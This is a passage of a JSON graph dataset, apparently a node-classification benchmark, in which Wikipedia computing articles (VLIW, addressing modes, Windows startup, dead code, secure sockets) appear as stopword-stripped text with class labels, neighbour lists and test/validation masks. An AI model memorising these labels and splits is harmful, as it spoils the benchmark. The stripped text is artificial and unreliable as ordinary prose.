      6256,
      1137,
      4211,
      5235,
      630,
      6774,
      8822,
      10361,
      3194,
      7802,
      6268,
      3197,
      638,
      9851,
      644,
      7302,
      1677,
      7313,
      8851,
      7833,
      8352,
      5793,
      2210,
      4258,
      6818,
      4773,
      5798,
      6821,
      1707,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      11447,
      8890,
      1725,
      4286,
      5309,
      2241,
      2243,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      6878,
      11487,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      3835,
      8700,
      6909,
      7421,
      8447,
      6914,
      1798,
      3846,
      1801,
      781,
      6926,
      6415,
      785,
      1298,
      4881,
      11539,
      7963,
      1309,
      10013,
      2337,
      4386,
      2339,
      6949,
      6950,
      2345,
      3882,
      5417,
      4909,
      3886,
      7988,
      309,
      8501,
      11062,
      5948,
      11580,
      4928,
      8514,
      8003,
      5956,
      4423,
      11080,
      7497,
      330,
      1866,
      6476,
      8523,
      1871,
      1872,
      7505,
      8530,
      9044,
      11604,
      344,
      2394,
      11613,
      8543,
      1376,
      11618,
      3431,
      10603,
      8048,
      4465,
      10612,
      11636,
      1399,
      7033,
      1402,
      10618,
      5503,
      3457,
      3459,
      392,
      3467,
      398,
      3470,
      3472,
      1425,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      3493,
      8102,
      9126,
      426,
      938,
      10669,
      1967,
      2480,
      4017,
      10675,
      1461,
      1463,
      6072,
      7607,
      4030,
      453,
      3014,
      1480,
      7631,
      466,
      980,
      3540,
      5078,
      2008,
      473,
      1499,
      3547,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      3575,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 6816,
    "label": 4,
    "text": "Secure_Network_Programming:secure network programming secure network programming snp prototype first secure sockets layer designed built networking research laboratory university texas austin led simon s. lam work published 1994 usenix summer technical conference project authors 2004 acm software system award work began 1991 theoretical investigation networking research laboratory formal meaning protocol layer satisfying upper interface specification service provider lower interface specification service consumer networking research laboratory received grant national security agency june 1991 investigate apply theory modules interfaces security verification time three well-known authentication systems built mit kerberos developed dec spx ibm kryptoknight systems suffered common drawback namely export clean easy-to-use interface could readily used internet applications example would take tremendous amount effort “ kerberize ” existing distributed application toward goal secure network programming masses inventors snp conceived secure sockets high-level abstraction suitable securing internet applications 1993 designed built prototype snp designed application sublayer top sockets snp provides user interface closely resembling sockets resemblance design security could retrofitted existing socket programs minor modifications also sublayer carefully designed implementation thoroughly debugged easily used internet application uses sockets end-to-end communications natural idea hindsight 1993 novel major departure mainstream network security research time snp secure sockets support stream datagram semantics security guarantees i.e. data origin authenticity data destination authenticity data integrity data confidentiality many ideas design choices snp found subsequent secure sockets layers including placing authenticated communication endpoints application layer use public key cryptography authentication handshake protocol establishing session state including shared secret use symmetric key cryptography data confidentiality managing contexts credentials secure sockets layer paper presented june 8 1994 usenix summer technical conference includes system design together performance measurement results prototype implementation clearly demonstrate practicality secure sockets layer snp invented secure sockets internet applications general independently concurrently design development http protocol world-wide web still infancy 1993 subsequent secure socket layers ssl netscape tls ietf re-implemented several years later using key ideas first presented snp enabled secure e-commerce browsers servers today many internet applications including email use https consists http running secure sockets layer",
    "neighbors": [
      6098
    ],
    "mask": "None"
  },
  {
    "node_id": 6817,
    "label": 9,
    "text": "Dead_code:dead code computer programming dead code section source code program executed whose result never used computation execution dead code wastes computation time memory result dead computation may never used may raise exceptions affect global state thus removal code may change output program introduce unintended bugs compiler optimizations typically conservative approach dead code removal ambiguity whether removal dead code affect program output programmer may aid compiler matter making additional use static and/or inline functions enabling use link-time optimization example although division ix iy computed never used throw exception division zero occurs therefore removal dead code may change output program dead code elimination form compiler optimization dead code removed program dead code analysis performed using live variable analysis form static code analysis data flow analysis contrast unreachable code analysis based control flow analysis dead code elimination technique class optimizations unreachable code elimination redundant code elimination large programming projects sometimes difficult recognize eliminate dead code particularly entire modules become dead test scaffolding make appear code still live times contract language require delivery code even code longer relevant ides xcode visual studio 2010 eclipse galileo ability locate dead code compiling stage optimization techniques seek remove dead code implementation extreme forms optimization size may sometimes desirable deliberately introduce carefully shape seemingly dead code allows fold otherwise unrelated code sections together thereby reduce combined size extra code effectively harm first path execution code used carry actions necessary alternative paths execution sections code may become dead code functional level seen artificially introduction harmless/useful side-effects reduction redundancy code also used opcode level order allow usage shorter instructions would possible folding code sequences without concerted introduction side-effects caused dead code",
    "neighbors": [
      11446,
      9866,
      2620,
      10618
    ],
    "mask": "None"
  },
  {
    "node_id": 6818,
    "label": 3,
    "text": "Very_long_instruction_word:long instruction word long instruction word vliw refers instruction set architectures designed exploit instruction level parallelism ilp whereas conventional central processing units cpu processor mostly allow programs specify instructions execute sequence vliw processor allows programs explicitly specify instructions execute parallel design intended allow higher performance without complexity inherent designs traditional means improve performance processors include dividing instructions substeps instructions executed partly time termed pipelining dispatching individual instructions executed independently different parts processor superscalar architectures even executing instructions order different program out-of-order execution methods complicate hardware larger circuits higher cost energy use processor must make decisions internally methods work contrast vliw method depends programs providing decisions regarding instructions execute simultaneously resolve conflicts practical matter means compiler software used create final programs becomes far complex hardware simpler many means parallelism processor executes every instruction one i.e. non-pipelined scalar architecture may use processor resources inefficiently yielding potential poor performance performance improved executing different substeps sequential instructions simultaneously termed pipelining even executing multiple instructions entirely simultaneously superscalar architectures improvement achieved executing instructions order different occur program termed out-of-order execution three methods raise hardware complexity executing operations parallel processor must verify instructions interdependencies example first instruction result used second instruction input execute time second instruction execute first modern out-of-order processors increased hardware resources schedule instructions determine interdependencies contrast vliw executes operations parallel based fixed schedule determined programs compiled since determining order execution operations including operations execute simultaneously handled compiler processor need scheduling hardware three methods described require thus vliw cpus offer computing less hardware complexity greater compiler complexity superscalar cpus superscalar designs number execution units invisible instruction set instruction encodes one operation superscalar designs instruction width 32 bits fewer contrast one vliw instruction encodes multiple operations least one operation execution unit device example vliw device five execution units vliw instruction device five operation fields field specifying operation done corresponding execution unit accommodate operation fields vliw instructions usually least 64 bits wide far wider architectures example following instruction super harvard architecture single-chip computer sharc one cycle floating-point multiply floating-point add two autoincrement loads fits one 48-bit instruction codice_1 since earliest days computer architecture cpus added several arithmetic logic units alus run parallel superscalar cpus use hardware decide operations run parallel runtime vliw cpus use software compiler decide operations run parallel advance complexity instruction scheduling moved compiler complexity hardware reduced substantially similar problem occurs result parallelizable instruction used input branch modern cpus guess branch taken even calculation complete load instructions branch architectures even start compute speculatively cpu guesses wrong instructions context need flushed correct ones loaded takes time led increasingly complex instruction-dispatch logic attempts guess correctly simplicity original reduced instruction set computing risc designs eroded vliw lacks logic thus lacks energy use possible design defects negative aspects vliw compiler uses heuristics profile information guess direction branch allows move preschedule operations speculatively branch taken favoring likely path expects branch branch takes unexpected way compiler already generated compensating code discard speculative results preserve program semantics vector processor single instruction multiple data simd cores combined vliw architecture fujitsu fr-v microprocessor increasing throughput speed concept vliw architecture term vliw invented josh fisher research group yale university early 1980s original development trace scheduling compiling method vliw developed graduate student new york university vliw notion prescheduling execution units instruction-level parallelism software well established practice developing horizontal microcode fisher innovations involved developing compiler could target horizontal microcode programs written ordinary programming language realized get good performance target wide-issue machine would necessary find parallelism beyond generally within basic block also developed region scheduling methods identify parallelism beyond basic blocks trace scheduling method involves scheduling likely path basic blocks first inserting compensating code deal speculative motions scheduling second likely trace schedule complete fisher second innovation notion target cpu architecture designed reasonable target compiler compiler architecture vliw processor must codesigned inspired partly difficulty fisher observed yale compiling architectures like floating point systems fps164 complex instruction set computing cisc architecture separated instruction initiation instructions saved result needing complex scheduling algorithms fisher developed set principles characterizing proper vliw design self-draining pipelines wide multi-port register files memory architectures principles made easier compilers emit fast code first vliw compiler described ph.d. thesis john ellis supervised fisher compiler named bulldog yale mascot fisher left yale 1984 found startup company multiflow along cofounders john o'donnell john ruttenberg multiflow produced trace series vliw minisupercomputers shipping first machines 1987 multiflow vliw could issue 28 operations parallel per instruction trace system implemented mix medium-scale integration msi large-scale integration lsi large-scale integration vlsi packaged cabinets technology obsoleted grew cost-effective integrate components processor excluding memory one chip multiflow early catch following wave chip architectures began allow multiple-issue cpus major semiconductor companies recognized value multiflow technology context compiler architecture subsequently licensed firms cydrome company producing vliw numeric processors using emitter-coupled logic ecl integrated circuits timeframe late 1980s company like multiflow failed years one licensees multiflow technology hewlett-packard josh fisher joined multiflow demise bob rau founder cydrome also joined hp cydrome failed two would lead computer architecture research hewlett-packard 1990s along systems time 1989–1990 intel implemented vliw intel i860 first 64-bit microprocessor first processor implement vliw one chip processor could operate simple risc mode vliw mode early 1990s intel introduced i860 risc microprocessor simple chip two modes operation scalar mode vliw mode vliw mode processor always fetched two instructions assumed one integer instruction floating-point i860 vliw mode used extensively embedded digital signal processor dsp applications since application execution datasets simple well ordered predictable allowing designers fully exploit parallel execution advantages enabled vliw vliw mode i860 could maintain floating-point performance range 20-40 double-precision mflops high value time processor running 25-50mhz 1990s hewlett-packard researched problem side effect ongoing work pa-risc processor family found cpu could greatly simplified removing complex dispatch logic cpu placing compiler compilers day far complex 1980s added complexity compiler considered small cost vliw cpus usually made multiple risc-like execution units operate independently contemporary vliws usually four eight main execution units compilers generate initial instruction sequences vliw cpu roughly manner traditional cpus generating sequence risc-like instructions compiler analyzes code dependence relationships resource requirements schedules instructions according constraints process independent instructions scheduled parallel vliws typically represent instructions scheduled parallel longer instruction word incorporates individual instructions results much longer opcode termed long specify executes given cycle examples contemporary vliw cpus include trimedia media processors nxp formerly philips semiconductors super harvard architecture single-chip computer sharc dsp analog devices c6000 digital signal processor dsp family texas instruments st200 family stmicroelectronics based lx architecture designed josh fisher hp lab paolo faraboschi mppa manycore family kalray contemporary vliw cpus mainly successful embedded media processors consumer electronic devices vliw features also added configurable processor cores system-on-a-chip soc designs example tensilica xtensa lx2 processor incorporates technology named flexible length instruction extensions flix allows multi-operation instructions xtensa c/c++ compiler freely intermix 32- 64-bit flix instructions xtensa processor one-operation risc instructions 16 24 bits wide packing multiple operations wide 32- 64-bit instruction word allowing multi-operation instructions intermix shorter risc instructions flix allows soc designers realize vliw performance advantages eliminating code bloat early vliw architectures infineon carmel dsp another vliw processor core intended soc uses similar code density improvement method called configurable long instruction word cliw outside embedded processing markets intel itanium ia-64 explicitly parallel instruction computing epic elbrus 2000 appear examples widely used vliw cpu architectures however epic architecture sometimes distinguished pure vliw architecture since epic advocates full instruction predication rotating register files long instruction word encode non-parallel instruction groups vliws also gained significant consumer penetration graphics processing unit gpu market though nvidia amd since moved risc architectures improve performance non-graphics workloads ati technologies ati advanced micro devices amd terascale microarchitecture graphics processing units gpus vliw microarchitecture december 2015 first shipment pcs based vliw cpu elbrus-4s made russia silicon technology allowed wider implementations execution units built compiled programs earlier generation would run wider implementations encoding binary instructions depended number execution units machine transmeta addressed issue including binary-to-binary software compiler layer termed code morphing crusoe implementation x86 architecture mechanism advertised basically recompile optimize translate x86 opcodes runtime cpu internal machine code thus transmeta chip internally vliw processor effectively decoupled x86 cisc instruction set executes intel itanium architecture among others solved backward-compatibility problem general mechanism within multiple-opcode instructions bit field allocated denote dependency prior vliw instruction within program instruction stream bits set compile time thus relieving hardware calculating dependency information dependency information encoded instruction stream allows wider implementations issue multiple non-dependent vliw instructions parallel per cycle narrower implementations would issue smaller number vliw instructions per cycle another perceived deficiency vliw designs code bloat occurs one execution unit useful work thus must execute operation nop instructions occurs dependencies code instruction pipelines must allowed drain later operations proceed since number transistors chip grown perceived disadvantages vliw diminished importance vliw architectures growing popularity especially embedded system market possible customize processor application system-on-a-chip embedded vliw products available several vendors including fr-v fujitsu bsp15/16 pixelworks st231 stmicroelectronics trimedia nxp semiconductors ceva-x dsp ceva jazz dsp improv systems silicon hive texas instruments tms320 dsp line evolved c6xxx family look like vliw contrast earlier c5xxx family",
    "neighbors": [
      7173,
      7687,
      9739,
      9741,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      3630,
      9774,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      8262,
      2635,
      1614,
      2638,
      4188,
      9309,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      146,
      9368,
      6815,
      8352,
      5793,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      725,
      10966,
      731,
      10971,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      7421,
      7940,
      7941,
      1798,
      5384,
      1801,
      6926,
      6415,
      1298,
      11539,
      2838,
      10013,
      2337,
      2850,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      7998,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      1387,
      10603,
      4465,
      372,
      10612,
      1399,
      7033,
      1402,
      11130,
      3457,
      9095,
      398,
      3470,
      5518,
      5523,
      9622,
      407,
      409,
      1952,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      9137,
      10675,
      1461,
      1462,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      2523,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      4078,
      6639,
      10734,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 6819,
    "label": 9,
    "text": "SmithProject:smithproject smithproject open source cfml script engine smith project initiated youngculture ag based need migrate large coldfusion based web application java-based engine cfml engines include adobe coldfusion new atlanta bluedragon lucee railo coral web builder",
    "neighbors": [
      4512,
      5314,
      5677,
      9144,
      5048,
      4507
    ],
    "mask": "Test"
  },
  {
    "node_id": 6820,
    "label": 2,
    "text": "Windows_startup_process:windows startup process windows startup process process microsoft windows series operating systems initializes windows versions 1.01 windows 2.11 system loaded codice_1 executed loaded codice_2 codice_3 codice_4 codice_5 along configuration settings file codice_6 default shell ms-dos executive modules codice_7 codice_8 codice_9 fonts various device drivers codice_10 codice_11 codice_12 incorporated codice_2/codice_3 codice_4/codice_5 windows 3.x 95/98/me boot loader phase handled ms-dos boot phase codice_17 codice_18 executed along configuration settings files codice_6 codice_20 virtual device drivers also loaded startup process commonly loaded registry codice_21 codice_20 file system configuration files device drivers loaded 16-bit modules codice_23 codice_7 codice_9 loaded 32-bit dlls codice_26 codice_27 codice_28 loaded 32-bit vxd message server msgsrv32 starts codice_29 responsible loading network logon client client microsoft networks microsoft family logon windows logon user logging windows startup sound played shell usually codice_30 loaded boot section codice_20 file startup items loaded versions windows 9x except also possible load windows booting dos prompt typing win command line switches used win command codice_32 switch windows boots safe mode codice_33 switch windows boots safe mode networking latter switch works properly windows 95 windows 3.1 additional options available codice_34 starts windows 386 enhanced mode codice_35 starts windows standard mode startup sound added windows 3.1 windows nt boot loader called ntldr responsible accessing file system boot drive starting ntoskrnl.exe loading boot-time device drivers memory boot system drivers loaded kernel system thread starts session manager subsystem smss.exe turn starts winlogon loads graphical identification authentication library user successfully logged machine winlogon following windows 95/98/me also possible run program user logs using runservicesonce runservices keys windows nt replaced services.exe program able load set system services user logs additionally english-language versions windows startup folder called startup instead startup win9x due minimally restricted environment operating systems program add startup registry key system folder method frequently used malware sequence booting windows vista later versions different previous version windows uses nt kernel operating system boot loader vista called winload.exe invoked windows boot manager additionally gina use versions windows nt since 3.1 entirely replaced credential providers",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      7207,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      7515,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6821,
    "label": 3,
    "text": "Addressing_mode:addressing mode addressing modes aspect instruction set architecture central processing unit cpu designs various addressing modes defined given instruction set architecture define machine language instructions architecture identify operand instruction addressing mode specifies calculate effective memory address operand using information held registers and/or constants contained within machine instruction elsewhere computer programming addressing modes primarily interest write assembly languages compiler writers note generally accepted way naming various addressing modes particular different authors computer manufacturers may give different names addressing mode names different addressing modes furthermore addressing mode one given architecture treated single addressing mode may represent functionality another architecture covered two addressing modes example complex instruction set computer cisc architectures digital equipment corporation dec vax treat registers literal immediate constants another addressing mode others ibm system/360 successors reduced instruction set computer risc designs encode information within instruction thus latter machines three distinct instruction codes copying one register another copying literal constant register copying contents memory location register vax single mov instruction term addressing mode subject different interpretations either memory address calculation mode operand accessing mode first interpretation instructions read memory write memory add literal register considered addressing mode second interpretation allows machines vax use operand mode bits allow register literal operand first interpretation applies instructions load effective address addressing modes listed divided code addressing data addressing computer architectures maintain distinction architectures allow almost addressing modes used context instructions shown purely representative order illustrate addressing modes necessarily reflect mnemonics used particular computer different computer architectures vary greatly number addressing modes provide hardware benefits eliminating complex addressing modes using one simpler addressing modes even though requires extra instructions perhaps extra register proven much easier design pipelined cpus addressing modes available simple ones risc architectures five simple addressing modes cisc architectures dec vax dozen addressing modes quite complicated ibm system/360 architecture three addressing modes added system/390 addressing modes particular addressing mode required usually encoded within instruction code e.g ibm system/360 successors risc lots addressing modes specific field often set aside instruction specify addressing mode dec vax allowed multiple memory operands almost instructions reserved first bits operand specifier indicate addressing mode particular operand keeping addressing mode specifier bits separate opcode operation bits produces orthogonal instruction set even computer many addressing modes measurements actual programs indicate simple addressing modes listed account 90 addressing modes used since measurements based code generated high-level languages compilers reflects extent limitations compilers used instruction set architectures intel x86 ibm/360 successors load effective address instruction performs calculation effective operand address instead acting memory location loads address would accessed register useful passing address array element subroutine may also slightly sneaky way calculations normal one instruction example using instruction addressing mode base+index+offset detailed allows one add two registers constant together one instruction |jump| address effective address absolute instruction address address parameter modifications |jump| offset jump relative effective address pc-relative instruction address offset parameter added address next instruction offset usually signed allow reference code instruction particularly useful connection jumps typical jumps nearby instructions high-level language statements reasonably short measurements actual programs suggest 8 10 bit offset large enough 90 conditional jumps roughly ±128 ±512 bytes another advantage pc-relative addressing code may position-independent i.e loaded anywhere memory without need adjust addresses versions addressing mode may conditional referring two registers jump reg1=reg2 one register jump unless reg1=0 registers implicitly referring previously-set bit status register see also conditional execution |jumpvia| reg effective address register indirect instruction address specified register example a7 access content address register a7 effect transfer control instruction whose address specified register many risc machines well cisc ibm system/360 successors subroutine call instructions place return address address register—the register-indirect addressing mode used return subroutine call nop execute following instruction cpu executing sequential instruction immediately executes following instruction sequential execution considered addressing mode computers instructions cpu architectures sequential instructions instructions sequential instructions cpu designers often add features deliberately sacrifice performance instructions—branch instructions—in order make sequential instructions run faster conditional branches load pc one 2 possible results depending condition—most cpu architectures use addressing mode taken branch sequential execution taken branch many features modern cpus -- instruction prefetch complex pipelineing out-of-order execution etc -- maintain illusion instruction finishes next one begins giving final results even though exactly happens internally basic block sequential instructions exhibits temporal spatial locality reference cpus use sequential execution program counter extremely rare cpus instruction always specifies address next instruction cpus instruction pointer holds specified address program counter provision incrementing cpus include drum memory computers ibm 650 secd machine rtx 32p computing architectures go much attempting bypass von neumann bottleneck using variety alternatives program counter computer architectures conditional instructions arm longer instructions 64-bit mode conditional load instructions x86 cases make conditional branches unnecessary avoid flushing instruction pipeline instruction 'compare used set condition code subsequent instructions include test condition code see whether obeyed ignored |skipeq| reg1| reg2| skip next instruction reg1=reg2 skip addressing may considered special kind pc-relative addressing mode fixed +1 offset like pc-relative addressing cpus versions addressing mode refer one register skip reg1=0 registers implicitly referring previously-set bit status register cpus version selects specific bit specific byte test skip bit 7 reg12 0 unlike conditional branches skip instruction never needs flush instruction pipeline though may need cause next instruction ignored mul reg1| reg2| reg3| reg1 reg2 reg3 addressing mode effective address considered addressing mode computers example operands registers result placed register sometimes referred 'base plus displacement' offset usually signed 16-bit value though 80386 expanded 32 bits offset zero becomes example register indirect addressing effective address value base register many risc machines register 0 fixed value zero register 0 used base register becomes example absolute addressing however small portion memory accessed 64 kilobytes offset 16 bits 16-bit offset may seem small relation size current computer memories 80386 expanded 32-bit could worse ibm system/360 mainframes unsigned 12-bit offset however principle locality reference applies short time span data items program wants access fairly close addressing mode closely related indexed absolute addressing mode example 1 within subroutine programmer mainly interested parameters local variables rarely exceed 64 kb one base register frame pointer suffices routine class method object-oriented language second base register needed points attributes current object self high level languages example 2 base register contains address composite type record structure offset used select field record records/structures less 32 kb size add reg1| reg2| constant reg1 reg2 constant addressing mode effective address considered addressing mode computers constant might signed unsigned example codice_1 move immediate hex value feedabba register d0 instead using operand memory value operand held within instruction dec vax machine literal operand sizes could 6 8 16 32 bits long andrew tanenbaum showed 98 constants program would fit 13 bits see risc design philosophy clear carry bit implied addressing mode also called implicit addressing mode x86 assembly language explicitly specify effective address either source destination sometimes either source destination effective address sometimes implied opcode implied addressing quite common older computers mid-1970s computers typically single register arithmetic could performed—the accumulator accumulator machines implicitly reference accumulator almost every instruction example operation b c done using sequence load b add c store -- destination accumulator implied every load add instruction source accumulator implied every store instruction later computers generally one general purpose register ram location could source destination arithmetic—and later computers need addressing mode specify source destination arithmetic among x86 instructions use implicit registers one operands results multiplication division counting conditional jump many computers x86 avr one special-purpose register called stack pointer implicitly incremented decremented pushing popping data stack source destination effective address implicitly address stored stack pointer many 32-bit computers 68000 arm powerpc one register could used stack pointer—and use register autoincrement indirect addressing mode specify registers used pushing popping data stack current computer architectures e.g ibm/390 intel pentium contain instructions implicit operands order maintain backwards compatibility earlier designs many computers instructions flip user/system mode bit interrupt-enable bit etc implicitly specify special register holds bits simplifies hardware necessary trap instructions order meet popek goldberg virtualization requirements—on system trap logic need look operand final effective address opcode cpus designed every operand always implicitly specified every instruction -- zero-operand cpus load reg address requires space instruction quite large address often available cisc machines variable-length instructions x86 risc machines special load upper literal instruction places 16- 20-bit constant top half register used base register base-plus-offset addressing mode supplies low-order 16 12 bits combination allows full 32-bit address load reg |index| address also requires space instruction quite large address address could start array vector index could select particular array element required processor may scale index register allow size array element note less base-plus-offset addressing mode except offset case large enough address memory location example 1 within subroutine programmer may define string local constant static variable address string stored literal address instruction offset—which character string use iteration loop—is stored index register example 2 programmer may define several large arrays globals class variables start array stored literal address perhaps modified program-load time relocating loader instruction references offset—which item array use iteration loop—is stored index register often instructions loop re-use register loop counter offsets several arrays load reg base|index| base register could contain start address array vector index could select particular array element required processor may scale index register allow size array element could used accessing elements array passed parameter load reg base|index| offset base register could contain start address array vector records index could select particular record required offset could select field within record processor may scale index register allow size array element load reg base|index| base register could contain start address array vector data structure index could contain offset one particular array element required addressing mode dynamically scales value index register allow size array element e.g array elements double precision floating-point numbers occupying 8 bytes value index register multiplied 8 used effective address calculation scale factor normally restricted power two shifting rather multiplication used load reg1 base| computers distinct addressing mode many computers use base plus offset offset value 0 example a7 load reg base determining effective address value base register incremented size data item accessed example a7 would access content address register a7 increase address pointer a7 1 usually 1 word within loop addressing mode used step elements array vector high-level languages often thought good idea functions return result side effects lack side effects makes program understanding validation much easier addressing mode side effect base register altered subsequent memory access causes error e.g page fault bus error address error leading interrupt restarting instruction becomes much problematic since one registers may need set back state instruction originally started least two computer architectures implementation problems regard recovery interrupts addressing mode used load reg base| determining effective address value base register decremented size data item accessed within loop addressing mode used step backwards elements array vector stack implemented using mode conjunction previous addressing mode autoincrement see discussion side-effects autoincrement addressing mode addressing modes mentioned article could extra bit indicate indirect addressing i.e address calculated using mode fact address location typically complete word contains actual effective address indirect addressing may used code data make implementation pointers references handles much easier also make easier call subroutines otherwise addressable indirect addressing carry performance penalty due extra memory access involved early minicomputers e.g dec pdp-8 data general nova registers limited addressing range 8 bits hence use memory indirect addressing almost way referring significant amount memory load reg1 base=pc offset pc-relative addressing mode used load register value stored program memory short distance away current instruction seen special case base plus offset addressing mode one selects program counter pc base register cpus support pc-relative data references cpus include mos 6502 derivatives used relative addressing branch instructions instructions used mode jumps used variety addressing modes x86-64 architecture 64-bit armv8-a architecture pc-relative addressing modes called rip-relative x86-64 literal armv8-a motorola 6809 also supports pc-relative addressing mode pdp-11 architecture vax architecture 32-bit arm architectures support pc-relative addressing pc register file addressing mode used compiler typically places constants literal pool immediately immediately subroutine uses prevent accidentally executing constants instructions addressing mode always fetches data memory stores data memory sequentially falls execute next instruction effective address points data confused pc-relative branch fetch data store data memory instead branches instruction given offset effective address points executable instruction addressing modes listed used 1950–1980 period longer available current computers list means complete many interesting peculiar addressing modes used time time e.g absolute-minus-logical-or two three index registers word size larger address word referenced memory-indirect addressing could indirect flag set indicate another memory indirect cycle flag referred indirection bit resulting pointer tagged pointer indirection bit tagging whether direct pointer indirect pointer care needed ensure chain indirect addresses refer one get infinite loop trying resolve address ibm 1620 data general nova hp 2100 series nar 2 multi-level memory indirect could enter infinite address calculation loop memory indirect addressing mode nova influenced invention indirect threaded code dec pdp-10 computer 18-bit addresses 36-bit words allowed multi-level indirect addressing possibility using index register stage well computers registers regarded occupying first 8 16 words memory e.g icl 1900 dec pdp-10 meant need separate add register register instruction – one could use add memory register instruction case early models pdp-10 cache memory tight inner loop loaded first words memory fast registers addressable installed ran much faster would magnetic core memory later models dec pdp-11 series mapped registers onto addresses input/output area primarily intended allow remote diagnostics confusingly 16-bit registers mapped onto consecutive 8-bit byte addresses dec pdp-8 minicomputer eight special locations addresses 8 15 accessed via memory indirect addressing locations would automatically increment use made easy step memory loop without needing use registers handle steps data general nova minicomputer 16 special memory locations addresses 16 31 accessed via memory indirect addressing 16 23 would automatically increment use 24 31 would automatically decrement use data general nova motorola 6800 family mos technology 6502 family processors internal registers arithmetic logical instructions mostly performed values memory opposed internal registers result many instructions required two-byte 16-bit location memory given opcodes processors one byte 8 bits length memory addresses could make significant part code size designers processors included partial remedy known zero page addressing initial 256 bytes memory 0000 – 00ff a.k.a. page 0 could accessed using one-byte absolute indexed memory address reduced instruction execution time one clock cycle instruction length one byte storing often-used data region programs could made smaller faster result zero page used similarly register file many systems however resulted high utilization zero page memory area operating system user programs limited use since free space limited zero page address mode enhanced several late model 8-bit processors including wdc 65816 csg 65ce02 motorola 6809 new mode known direct page addressing added ability move 256-byte zero page memory window start memory offset address 0000 new location within first 64 kb memory csg 65ce02 allowed direct page moved 256-byte boundary within first 64 kb memory storing 8-bit offset value new base page b register motorola 6809 could direct page dp register wdc 65816 went step allowed direct page moved location within first 64 kb memory storing 16-bit offset value new direct register result greater number programs able utilize enhanced direct page addressing mode versus legacy processors included zero page addressing mode similar scaled index addressing except instruction two extra operands typically constants hardware checks index value bounds another variation uses vector descriptors hold bounds makes easy implement dynamically allocated arrays still full bounds checking computers special indirect addressing modes subfields within words ge/honeywell 600 series character addressing indirect word specified either 6-bit 9-bit character fields within 36-bit word dec pdp-10 also 36-bit special instructions allowed memory treated sequence fixed-size bit fields bytes size 1 bit 36 bits one-word sequence descriptor memory called byte pointer held current word address within sequence bit position within word size byte instructions existed load store bytes via descriptor increment descriptor point next byte bytes split across word boundaries much dec software used five 7-bit bytes per word plain ascii characters one bit per word unused implementations c use four 9-bit bytes per word since 'malloc function c assumes size int multiple size char actual multiple determined system-dependent compile-time operator sizeof elliott 503 elliott 803 apollo guidance computer used absolute addressing index registers thus indirect jumps jumps registers supported instruction set instead could instructed add contents current memory word next instruction adding small value next instruction executed could example change codice_2 codice_3 thus creating effect indexed jump note instruction modified on-the-fly remains unchanged memory i.e self-modifying code value added next instruction large enough could modify opcode instruction well instead address",
    "neighbors": [
      1029,
      7173,
      9739,
      2062,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      3615,
      6181,
      8231,
      10796,
      3630,
      6705,
      7218,
      2620,
      2623,
      2113,
      7234,
      3142,
      9291,
      2638,
      1122,
      7269,
      3175,
      6250,
      8815,
      7281,
      630,
      3702,
      7286,
      8822,
      6268,
      3197,
      7313,
      1175,
      6296,
      7323,
      6815,
      8352,
      5793,
      6818,
      10403,
      7852,
      9391,
      2224,
      2226,
      7858,
      3767,
      9911,
      11447,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      5862,
      7911,
      10985,
      5354,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      7421,
      7940,
      2821,
      1798,
      1801,
      10508,
      6926,
      6415,
      1298,
      11539,
      8474,
      2334,
      4385,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      833,
      8514,
      9028,
      4423,
      8523,
      6476,
      10571,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      372,
      10612,
      1399,
      7033,
      1402,
      9599,
      3457,
      3459,
      3467,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3010,
      6596,
      453,
